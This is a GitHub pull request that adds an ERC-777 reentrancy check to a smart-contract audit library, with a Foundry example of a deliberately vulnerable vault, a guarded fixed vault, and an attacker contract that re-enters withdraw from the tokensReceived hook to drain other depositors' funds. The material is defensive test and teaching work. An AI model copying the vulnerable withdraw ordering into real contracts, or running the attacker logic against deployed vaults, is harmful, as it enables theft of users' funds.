
feat: add ERC777ReentrancyCheck for tokensReceived reentrancy #25

Open

invisiblemonsters wants to merge 1 commit into kcolbchain:main from invisiblemonsters:feat/erc777-reentrancy-check

Conversation

@invisiblemonsters

Summary

Fixes #19 — Add ERC-777 reentrancy detection to the audit checklist.

Changes

  • src/checks/ERC777ReentrancyCheck.sol: Abstract check that detects ERC-777 tokensReceived reentrancy by deploying a mock ERC-777 token and an attacker that re-enters from the callback hook
  • test/ERC777Reentrancy.t.sol: Test suite with VulnerableERC777Vault fixture (withdraws before balance update — classic 2020 imBTC/Uniswap V1 bug) and a FixedAudit variant proving the check passes when reentrancy is mitigated
  • README.md: Added ERC777ReentrancyCheck to checks table and architecture diagram

Acceptance Criteria

  • Check compiles; test passes when run against included vulnerable fixture
  • Test fails when fixture's nonReentrant guard is removed (demonstrated via withdrawFixed variant)
  • Documented in README.md under checks table

References

- src/checks/ERC777ReentrancyCheck.sol: abstract check detecting ERC-777 reentrancy
- test/ERC777Reentrancy.t.sol: test suite with VulnerableERC777Vault fixture
- README.md: add ERC777ReentrancyCheck to checks table and architecture

Closes kcolbchain#19
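The mechanism this PR targets, as an added Foundry example that is not code from this PR or from kcolbchain: a mock ERC-777 token whose `transfer` invokes the recipient's `tokensReceived` hook, a vault that sends tokens before zeroing the depositor's balance (the imBTC/Uniswap V1 pattern), a fixed vault that zeroes first and carries a `nonReentrant` guard, and an attacker contract that re-enters `withdraw` from inside the hook. All contract names (`MockERC777`, `BaseVault`, `VulnerableVault`, `FixedVault`, `HookAttacker`) are illustrative, `forge-std` is assumed to be installed, and the mock calls the hook directly on contract recipients rather than resolving the implementer through the ERC-1820 registry as a real ERC-777 token would.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
import {Test} from "forge-std/Test.sol";

// Added example, not code from this PR or kcolbchain; contract names are illustrative.
// Simplification: MockERC777 invokes tokensReceived directly on contract recipients
// instead of resolving the implementer through the ERC-1820 registry as ERC-777 does.
interface IERC777Recipient {
    function tokensReceived(address operator, address from, address to, uint256 amount,
        bytes calldata userData, bytes calldata operatorData) external;
}

contract MockERC777 {
    mapping(address => uint256) public balanceOf;
    function mint(address to, uint256 amount) external { balanceOf[to] += amount; }
    function transfer(address to, uint256 amount) external returns (bool) {
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;
        // The recipient hook runs inside the sender's call: this is the re-entry point.
        if (to.code.length > 0) IERC777Recipient(to).tokensReceived(msg.sender, msg.sender, to, amount, "", "");
        return true;
    }
}

abstract contract BaseVault is IERC777Recipient {
    MockERC777 public immutable token;
    mapping(address => uint256) public deposits;
    constructor(MockERC777 t) { token = t; }
    // Deposits are credited from the receive hook, as an ERC-777-aware vault does.
    function tokensReceived(address, address from, address, uint256 amount, bytes calldata, bytes calldata) external override {
        require(msg.sender == address(token), "not token");
        deposits[from] += amount;
    }
    function withdraw() external virtual;
}

// Vulnerable: the transfer (and its hook) runs before the deposit is zeroed.
contract VulnerableVault is BaseVault {
    constructor(MockERC777 t) BaseVault(t) {}
    function withdraw() external override {
        uint256 amount = deposits[msg.sender];
        require(amount > 0, "nothing to withdraw");
        token.transfer(msg.sender, amount); // attacker re-enters here with deposit still credited
        deposits[msg.sender] = 0;
    }
}

// Fixed: checks-effects-interactions plus a reentrancy guard; either alone blocks this attack.
contract FixedVault is BaseVault {
    uint256 private locked = 1;
    constructor(MockERC777 t) BaseVault(t) {}
    modifier nonReentrant() { require(locked == 1, "reentrant call"); locked = 2; _; locked = 1; }
    function withdraw() external override nonReentrant {
        uint256 amount = deposits[msg.sender];
        require(amount > 0, "nothing to withdraw");
        deposits[msg.sender] = 0;           // effect first
        token.transfer(msg.sender, amount); // interaction last
    }
}

contract HookAttacker is IERC777Recipient {
    MockERC777 public immutable token;
    BaseVault public immutable vault;
    uint256 private stake;
    constructor(MockERC777 t, BaseVault v) { token = t; vault = v; }
    function attack(uint256 amount) external {
        stake = amount;
        token.transfer(address(vault), amount); // the vault's hook credits deposits[this]
        vault.withdraw();
    }
    function tokensReceived(address, address from, address, uint256, bytes calldata, bytes calldata) external override {
        if (msg.sender != address(token) || from != address(vault)) return;
        // Re-enter while the vault can still pay the not-yet-zeroed deposit; try/catch keeps the
        // outer withdrawal alive when the guarded vault reverts the nested call.
        if (token.balanceOf(address(vault)) >= stake) { try vault.withdraw() {} catch {} }
    }
}

contract ERC777ReentrancyExampleTest is Test {
    function _deploy(bool fixedVault) internal returns (MockERC777 token, BaseVault vault, HookAttacker attacker) {
        token = new MockERC777();
        if (fixedVault) vault = new FixedVault(token); else vault = new VulnerableVault(token);
        attacker = new HookAttacker(token, vault);
        token.mint(address(vault), 9 ether);    // constructed: other depositors' funds
        token.mint(address(attacker), 1 ether); // attacker's stake
    }
    function testVulnerableVaultIsDrained() public {
        (MockERC777 token, BaseVault vault, HookAttacker attacker) = _deploy(false);
        attacker.attack(1 ether);
        assertEq(token.balanceOf(address(attacker)), 10 ether);
        assertEq(token.balanceOf(address(vault)), 0);
    }
    function testFixedVaultPaysOnlyTheStake() public {
        (MockERC777 token, BaseVault vault, HookAttacker attacker) = _deploy(true);
        attacker.attack(1 ether);
        assertEq(token.balanceOf(address(attacker)), 1 ether);
        assertEq(token.balanceOf(address(vault)), 9 ether);
    }
}
```

Run with `forge test -vv`. With a 1 ether stake the attacker walks the vulnerable vault down to zero in nine nested calls, each one reading a `deposits` entry that is zeroed only on unwind. Against the fixed vault the nested call reverts on the guard (and would also fail the `amount > 0` check, since the effect now precedes the interaction); the attacker's `try/catch` swallows that revert so only the legitimate 1 ether leaves. Both defences are worth keeping: the guard protects every entry point, while checks-effects-interactions makes the accounting correct even in functions the guard does not cover.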
@abhicris
Contributor

Welcome to kcolbchain, @invisiblemonsters — glad you're here. 🌱

Here's what happens from this PR:

  1. Our automated review looks for obvious issues (tests, secrets, size) within a couple of hours.
  2. If it's clean and CI passes, we merge without back-and-forth.
  3. If we need changes, we'll leave a specific comment — not a generic nit. Push another commit and we re-review.

While you wait:

  • Run the repo's tests locally (see the repo README.md).
  • Keep the PR scoped to one concern — bigger PRs land slower.
  • Don't commit tokens or .env contents.

What happens after your first merge

Thanks for writing the code. We're building this to last.

@abhicris
Contributor

🤖 Audit verdict: safe

Legitimate audit check library for detecting ERC-777 reentrancy vulnerabilities (imBTC/Uniswap V1 class); intentional vulnerable and fixed test contracts for demonstration; no malicious code, credentials, or logic errors detected.

Audited by the kcolbchain PR pipeline. See pipeline docs.



Development

Successfully merging this pull request may close these issues.

[good first issue] Add ERC-777 reentrancy test template (tokensReceived hook)
